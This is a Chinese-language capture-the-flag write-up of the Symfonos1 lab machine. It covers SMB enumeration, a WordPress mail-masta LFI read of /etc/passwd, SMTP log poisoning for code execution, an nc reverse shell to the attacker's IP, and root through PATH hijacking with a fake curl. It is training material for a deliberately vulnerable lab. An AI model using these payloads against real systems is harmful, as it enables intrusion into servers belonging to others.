Symfonos1靶机:Hacking Writeup

Symfonos1 是 Symfonos 系列靶机的第一关。

目录

1、扫描

  • Netdiscover
  • Nmap

2、枚举

  • SMB 共享目录
  • WPScan

3、漏洞利用

  • 利用 WordPress 的 LFI 漏洞
  • 通过 SMTP 日志投毒使 LFI 漏洞来实现 RCE

4、提权

  • 利用环境变量 PATH

Let's get it!


使用 netdiscover 命令来发现目标主机,这里靶机的 IP192.168.166.201

  • netdiscover -i eth0
image.png

使用 nmap 对靶机进行端口扫描,发现开放了以下端口:222580139445

image.png

接着使用使用 enum4linux 对靶机进行网络枚举,发现靶机存在一个名为 helios 的用户,以及两个 Samba 共享目录 /anonymous/helios

image.png

访问 Samba 共享目录:

image.png
image.png

先访问 /anonymous 目录,因为该目录无须输入密码即可访问:

image.png

查看 attention.txt 文件的内容:

image.png

上面提到几个弱密码,可用来尝试进入 /helios 目录,尝试后发现弱密码 qwerty 可进入 /helios 目录:

image.png

发现两个文件,research.txttodo.txt ,查看其内容,发现 research.txt 没啥用,todo.txt 中提到了一个目录 /h3l105,这也许是 Web站点的路径,我们可以尝试在 Web 中访问,于是访问 http://192.168.166.201/h3l105/,发现是一个使用了 WordPress 搭建的站点:

image.png
image.png

对该站点使用 BurpSuite 抓包可以看到,网站前端向服务器发请求的时候,还会请求一个域名 symfonos.local,其实该域名是就是指向靶机的 IP,所以我们在攻击机的 /etc/hosts 文件中加上该域名的解析记录:

image.png

然后使用 WPScan 对其进行扫描,加上 -ep 参数,枚举以下该站点使用的 wordpress 插件:

image.png

发现使用了 mail-mastasite-editor 这两个插件,使用 searchsploit 搜索一下看有没有相应的 exp

image.png

可以看到 mail-masta 这个插件的 1.0 版本存在两个漏洞,这里我们利用 LFI 漏洞,将 40290.txt 下载下来:

image.png

查看该文件,可看到该漏洞的 PoC 为:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

image.png

于是我们访问:
http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

可看到漏洞确实存在且可被利用:

image.png

因为前面端口扫描的时候,看到靶机还开放了 25 端口,该端口上运行的是 SMTP 邮件服务,所以下面我们通过 SMTP 日志投毒来使得 LFI 漏洞实现 RCE。

访问 http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios 可看到 /var/mail/helios 文件,该邮件记录的是 helios 用户收到的邮件信息。

于是我们可以使用 telnet 通过命令行向 helios 用户发送邮件,在邮件中插入恶意的 php 代码:

image.png

发送后,通过访问 http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&m=id 即可达到远程代码执行的效果

image.png

于是,用这种方式,使用 nc 命令,我们可以拿到一个反向 shell。

先监听本机 5555 端口:

image.png

访问 http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&m=nc%20-e%20/bin/bash%20192.168.166.176%205555

得到反向 shell:

image.png

为了提权,我们先通过 find 命令寻找有 sticky 位的程序文件:

  • find / -perm -u=s -type f 2>/dev/null
image.png

我们选择其中的 /opt/statuscheck 程序,该文件是一个二进制文件,因此我们使用 strings 命令查看它的元数据:

image.png

可以看到,该程序会去调用 curl 命令。因此我们可以通过自建一个 curl 命令,并通过临时配置环境变量 PATH,使得当 /opt/statuscheck 程序执行的时候,调用我自建的 curl 命令,从而获得一个拥有 root 权限的 shell。

依次执行下面的命令:

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
image.png

这种提权的方式,可阅读 Linux Privilege Escalation Using PATH Variable

Hacking done.

image.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,293评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,604评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,958评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,729评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,719评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,630评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,000评论 3 397
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,665评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,909评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,646评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,726评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,400评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,986评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,959评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,197评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,996评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,481评论 2 342

推荐阅读更多精彩内容